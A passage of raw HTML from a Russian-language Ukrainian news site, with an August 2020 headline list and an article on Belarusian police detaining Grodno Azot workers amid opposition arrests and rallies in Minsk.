href="https://enovosty.com/news_society/full/2508-minzdrav-obnovil-protivoepidemicheskie-pravila-dlya-shkol">Минздрав обновил противоэпидемические правила для школ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815707"> <span class="postDate">10:37</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-belarusi-nachalsya-prizyv-voennyx-iz-zapasa">В Беларуси начался призыв военных из запаса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815700"> <span class="postDate">09:39</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-ssha-nakryla-novaya-volna-protestov-iz-za-strelby-policejskix-v-spinu-afroamerikanca">США накрыла новая волна протестов из-за стрельбы полицейских в спину афроамериканца</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815697"> <span class="postDate">09:14</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2508-v-ukraine-za-sutki-chislo-zabolevshix-covid-19-prevysilo-1600-chelovek">В Украине за сутки число заболевших COVID-19 превысило 1600 человек</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815672"> <span class="postDate">09:02</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2508-kakaya-pogoda-ozhidaet-ukraincev-26-avgusta">Какая погода ожидает украинцев 25 августа</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815695"> <span class="postDate">08:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-kto-i-zachem-otravil-navalnogo-ekspert">Кто и зачем отравил Навального, - эксперт</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815693"> <span class="postDate">08:39</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2508-na-okkupirovannom-donbasse-v-den-nezavisimosti-terroristy-ustroili-provokaciyu-shtab-oos">На оккупированном Донбассе в День Независимости террористы устроили провокацию, - штаб ООС</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815689"> <span class="postDate">08:17</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2508-v-ukraine-s-1-sentyabrya-povysyat-pensii">В Украине с 1 сентября повысят пенсии</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815732"> <span class="postDate">07:59</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/2508-v-finskom-zalive-dajvery-obnaruzhili-zatonuvshij-korabl-17-veka">В Финском заливе дайверы обнаружили затонувший корабль 17 века</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815685"> <span class="postDate">07:51</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-v-belarusi-prodolzhayutsya-presledovaniya-oppozicionerov-laureata-nobelevskoj-premii-vyzvali-na-dopros">В Беларуси продолжаются преследования оппозиционеров: лауреата Нобелевской премии вызвали на допрос</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815683"> <span class="postDate">07:29</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2508-stalo-izvestno-kak-turciya-pozdravila-ukrainu-s-dnem-nezavisimosti">Турция незабываемо поздравила Украину с Днем Независимости (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815680"> <span class="postDate">07:12</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/2508-v-stolice-perekroyut-dvizhenie-iz-za-van-damma-podrobnosti">В столице перекроют движение из-за Ван-Дамма: подробности</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815675"> <span class="postDate">06:49</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-lider-severnoj-korei-vpal-v-komu-smi">Лидер Северной Кореи впал в кому, - СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815678"> <span class="postDate">06:19</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2508-pozdravlenie-s-dnem-nezavisimosti-iz-dubaya-samyj-vysokij-v-mire-neboskreb-podsvetili-cvetami-flaga-ukrainy">Поздравление с Днем Независимости из Дубая: самый высокий в мире небоскреб подсветили цветами флага Украины</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>24.08.2020 г.</span><br /><div class="post_news"> <span id="post-4815665"> <span class="postDate">23:03</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2408-foto-dnya-marsh-zashhitnikov-ukrainy-na-majdane-v-den-nezavisimosti">Фото дня: Марш защитников Украины на Майдане в День Независимости</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815660"> <span class="postDate">20:25</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2408-klinika-sharite-navalnogo-otravili">Клиника «Шарите»: Навального отравили</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815644"> <span class="postDate">18:07</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2408-covid-19-izrail-prodlil-zapret-na-vezd-inostrancev-do-1-oktyabrya">COVID-19: Израиль продлил запрет на въезд иностранцев до 1 октября</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815643"> <span class="postDate">17:11</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/2408-nacbank-sozdast-reestr-kollektorskix-kompanij">Нацбанк создаст реестр коллекторских компаний</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815639"> <span class="postDate">16:51</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2408-sozdana-effektivnaya-vakcina-ot-koronavirusa-opublikovany-rezultaty-issledovaniya">Создана эффективная вакцина от коронавируса - опубликованы результаты исследования</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815638"> <span class="postDate">16:26</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2408-ukrast-golosa-klichko-zhurnalist-rasskazal-o-missii-kandidatov-v-mery-kieva-popova-i-palchevskogo">Миссия кандидатов от ОПЗЖ Попова и Пальчевского – украсть голоса Кличко</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815637"> <span class="postDate">15:56</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2408-minoborony-belarusi-v-zapushhennyx-iz-litvy-sharikax-mogli-byt-vzryvchatye-veshhestva">Минобороны Беларуси: в запущенных из Литвы шариках могли быть взрывчатые вещества</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815636"> <span class="postDate">15:42</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2408-kravchuk-lukashenko-obratilsya-k-putinu-za-voennoj-pomoshhyu">Кравчук: Лукашенко обратился к Путину за военной помощью</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815614"> <span class="postDate">15:15</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2408-kazaxstan-zayavil-ob-izobretenii-vakciny-ot-covid-19">Казахстан заявил об изобретении вакцины от COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815634"> <span class="postDate">15:12</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2408-v-kremle-razrabotali-dva-scenariya-razvitiya-situacii-v-belarusi-centr-dose">В Кремле разработали два сценария развития ситуации в Беларуси – центр "Досье"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815630"> <span class="postDate">12:42</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2408-rech-prezidenta-zelenskogo-na-torzhestvennom-prazdnovanii-dnya-nezavisimosti-ukrainy-2020-video">Речь президента Зеленского на торжественном праздновании Дня Независимости Украины 2020 (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815628"> <span class="postDate">12:21</span> <a class="postTitle" href="https://enovosty.com/news_politics/full/2408-vladimir-zelenskij-i-pervaya-ledi-vozlozhili-cvety-k-memorialu-geroev-nebesnoj-sotni">Владимир Зеленский и первая леди возложили цветы к мемориалу Героев Небесной сотни</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815617"> <span class="postDate">11:27</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2408-lukashenko-v-bronezhilete-nazval-protestuyushhix-grazhdan-belorussii-krysami">Лукашенко в бронежилете обозвал протестующих граждан Беларуси "крысами"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815616"> <span class="postDate">10:40</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2408-v-ssha-razreshili-perelivat-plazmu-perebolevshix-dlya-lecheniya-covid-19">В США разрешили переливать плазму переболевших для лечения COVID-19</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4815618"> <span class="postDate">10:17</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2408-nemeckaya-policiya-vzyala-pod-kruglosutochnuyu-oxranu-kliniku-gde-lechat-alekseya-navalnogo">Немецкая полиция взяла под круглосуточную охрану клинику, где лечат Алексея Навального</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4815775"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_abroad/full/2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">В белорусскую милицию доставили более 20 сотрудников &#171;Гродно Азот&#187;</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_abroad">Новости мира</a> <span>&raquo;</span> В белорусскую милицию доставили более 20 сотрудников "Гродно Азот"</div><time datetime="2020-08-25T20:26:13+03:00"><span id="date">Новости мира, 20:26:13 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%92+%D0%B1%D0%B5%D0%BB%D0%BE%D1%80%D1%83%D1%81%D1%81%D0%BA%D1%83%D1%8E+%D0%BC%D0%B8%D0%BB%D0%B8%D1%86%D0%B8%D1%8E+%D0%B4%D0%BE%D1%81%D1%82%D0%B0%D0%B2%D0%B8%D0%BB%D0%B8+%D0%B1%D0%BE%D0%BB%D0%B5%D0%B5+20+%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2+%22%D0%93%D1%80%D0%BE%D0%B4%D0%BD%D0%BE+%D0%90%D0%B7%D0%BE%D1%82%22&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%92+%D0%B1%D0%B5%D0%BB%D0%BE%D1%80%D1%83%D1%81%D1%81%D0%BA%D1%83%D1%8E+%D0%BC%D0%B8%D0%BB%D0%B8%D1%86%D0%B8%D1%8E+%D0%B4%D0%BE%D1%81%D1%82%D0%B0%D0%B2%D0%B8%D0%BB%D0%B8+%D0%B1%D0%BE%D0%BB%D0%B5%D0%B5+20+%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2+%22%D0%93%D1%80%D0%BE%D0%B4%D0%BD%D0%BE+%D0%90%D0%B7%D0%BE%D1%82%22&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4815775" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><p><b>Белорусская милиция задержала более 20 сотрудников "Гродно Азот". </b></p> <div style="text-align:center;"> <div data-hyb-ssp-in-image-overlay="5ef49f174d506eacc0504d73"><img width="460" height="259" src="https://enovosty.com/wp-content/uploads/2020/08/54672947_303-460x259.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2020/08/54672947_303-460x259.jpg 460w, https://enovosty.com/wp-content/uploads/2020/08/54672947_303-112x63.jpg 112w, https://enovosty.com/wp-content/uploads/2020/08/54672947_303-300x169.jpg 300w, https://enovosty.com/wp-content/uploads/2020/08/54672947_303.jpg 500w" sizes="(max-width: 460px) 100vw, 460px" /></div></div> <p>Фото: <a href="https://twitter.com/sergey_elkin" target="_blank" rel="nofollow noopener noreferrer">Сергей Елкин</a></p><p>Она доставила их в РОВД города в рамках административного процесса. Как сообщила пресс-секретарь МВД Беларуси Ольга Чемоданова, задержанные доставлены в РОВД для разбирательства, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>Позже стало известно, что работники «Гродно Азота» покидают РОВД. У всех административные протоколы за участие в несанкционированных акциях протеста, впереди их ждет суд, сообщает «Sputnik <a class="tag" href="https://enovosty.com/tag/belarus" target="_blank">Беларусь</a>».</p><p>Между тем вечером во вторник на площади Независимости в центре Минска собрались сторонники бывшего кандидата в президенты Светланы Тихановской. В митинге участвуют несколько тысяч человек, <a href="https://www.mk.ru/incident/2020/08/25/v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot.html" target="_blank" rel="nofollow noopener noreferrer">пишет</a> МК</p><p class="readlink one_test"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_abroad/full/2508-kreml-mozhet-fizicheski-likvidirovat-lukashenko-ili-zagnat-ego-v-tupik-ekspert" >Кремль может физически ликвидировать Лукашенко или загнать его в тупик, - эксперт</a></p><p>Сегодня членам оппозиционного Координационного совета Беларуси Сергею Дылевскому и Ольге Ковальковой дали по 10 суток за организацию несанкционированного мероприятия. </p><p>Согласно протоколу, Ольга Ковалькова приняла активное участие в митинге перед входом Минского тракторного завода, публично призывала к забастовке, обсуждала с собравшимися работу органов госуправления и общественно-политическую жизнь в стране. Это сотрудники Партизанского РУВД Минска сочли нарушением закона о массовых мероприятиях, к месту встречи людей подъехал автозак с бойцами ОМОНа, которые задержали Ковалькову и Дылевского.</p><p>Ранее сегодня экс-директор Купаловского театра Павел Латушко провел 3,5 часа на допросе в СК из-за уголовного дела по созданию Координационного совета, <a href="https://news.tut.by/economics/697957.html" target="_blank" rel="nofollow noopener noreferrer">сообщает</a> tut.by</p><p>В то же время у Комаровского рынка в Минске проходит митинг в поддержку Лукашенко.</p><p>На митинге у Комаровского рынка Сергей Клишевич, первый секретарь Минского городского комитета БРСМ, поприветствовал собравшихся и сказал, что сейчас белорусов хотят разделить.</p><p>— Но мы не дадим этого сделать! Предлагаю начать наш торжественный митинг, чтобы сказать, что мы за Батьку, за Беларусь! — сказал он.</p><p>На митинге у Комаровского рынка в поддержку Лукашенко выступил Дмитрий Павличенко, экс-командир воинской части 3214, экс-командир СОБРа:</p><p>&#171;Трое суток мы стояли, ветераны вместе со спецназом и ОМОНом и разгромили их на голову. Не дадим же дальше продвижению этих экстремистских идей и экстремистских целей. За батьку, за Беларусь!&#187;, &#8212; сказал он.</p><p> Он вспомнил лихие 90-е и 30 банд, которые орудовали в столице. По его мнению, сейчас на улицах снова банды — «банды Тихановской». Собравшиеся сторонники Лукашенко скандируют «Нет фашизму в нашей стране», «Фашизм не пройдет!» и «Беларусь без Тихановской!», <a href="https://news.tut.by/economics/697957.html" target="_blank" rel="nofollow noopener noreferrer">пишут</a> беларусские СМИ</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4815775"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4815775&amp;_wpnonce=6d39a1fa96"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/enovosty_logo.png"/> <meta itemprop="width" content="512"> <meta itemprop="height" content="512"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2020-08-25T20:26:13+03:00"/><meta itemprop="dateModified" content="2020-08-25T20:29:26+03:00"/><meta itemprop="genre" content="Новости мира"/><meta itemprop="description" content="Белорусская милиция задержала более 20 сотрудников "Гродно Азот". "/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/08/54672947_303-460x259.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2020/08/54672947_303-460x259.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="259"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/youtube.jpg"></a><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/belarus" rel="tag">Беларусь</a>, <a href="https://enovosty.com/tag/protest-v-belarusi" rel="tag">протест в Беларуси</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 184</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%92+%D0%B1%D0%B5%D0%BB%D0%BE%D1%80%D1%83%D1%81%D1%81%D0%BA%D1%83%D1%8E+%D0%BC%D0%B8%D0%BB%D0%B8%D1%86%D0%B8%D1%8E+%D0%B4%D0%BE%D1%81%D1%82%D0%B0%D0%B2%D0%B8%D0%BB%D0%B8+%D0%B1%D0%BE%D0%BB%D0%B5%D0%B5+20+%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2+%22%D0%93%D1%80%D0%BE%D0%B4%D0%BD%D0%BE+%D0%90%D0%B7%D0%BE%D1%82%22&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%92+%D0%B1%D0%B5%D0%BB%D0%BE%D1%80%D1%83%D1%81%D1%81%D0%BA%D1%83%D1%8E+%D0%BC%D0%B8%D0%BB%D0%B8%D1%86%D0%B8%D1%8E+%D0%B4%D0%BE%D1%81%D1%82%D0%B0%D0%B2%D0%B8%D0%BB%D0%B8+%D0%B1%D0%BE%D0%BB%D0%B5%D0%B5+20+%D1%81%D0%BE%D1%82%D1%80%D1%83%D0%B4%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2+%22%D0%93%D1%80%D0%BE%D0%B4%D0%BD%D0%BE+%D0%90%D0%B7%D0%BE%D1%82%22&url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_abroad%2Ffull%2F2508-v-belorusskuyu-miliciyu-dostavili-bolee-20-sotrudnikov-grodno-azot"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4815775" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="d324cf02a3" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div><br> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/en_analitics.jpg" style="margin-right: 5px;margin-bottom: -2px;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4815714"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/society/full/2508-immunolog-andrej-volyanskij-zhestkij-karantin-rastyanet-pandemiyu-v-ukraine-na-dolgie-gody">Иммунолог Андрей Волянский: Жесткий карантин растянет пандемию в Украине на долгие годы</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4815532"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/ekonomika/full/2208-chem-lira-v-mire-otzovetsya-obostrit-li-defolt-turcii-globalnyj-koronakrizis">Чем лира в мире отзовется: Обострит ли дефолт Турции глобальный коронакризис?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4815398"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/2008-andrej-piontkovskij-scenarij-putina-i-lukashenko-po-anshlyuzu-i-transferu-vlasti-v-belarusi-provalitsya">Андрей Пионтковский: Сценарий Путина и Лукашенко по аншлюсу и трансферу власти в Беларуси провалится</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4814801"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" href="https://enovosty.com/politika/full/1208-anatomiya-belorusskoj-isterii">Протесты в Беларуси: Анатомия белорусской истерии</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4813876"><div class="blockTitle" style="margin:4px 0;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/bullet3.gif" style="margin-right: 5px;margin-bottom: 1px;" /><a class="postTitle" 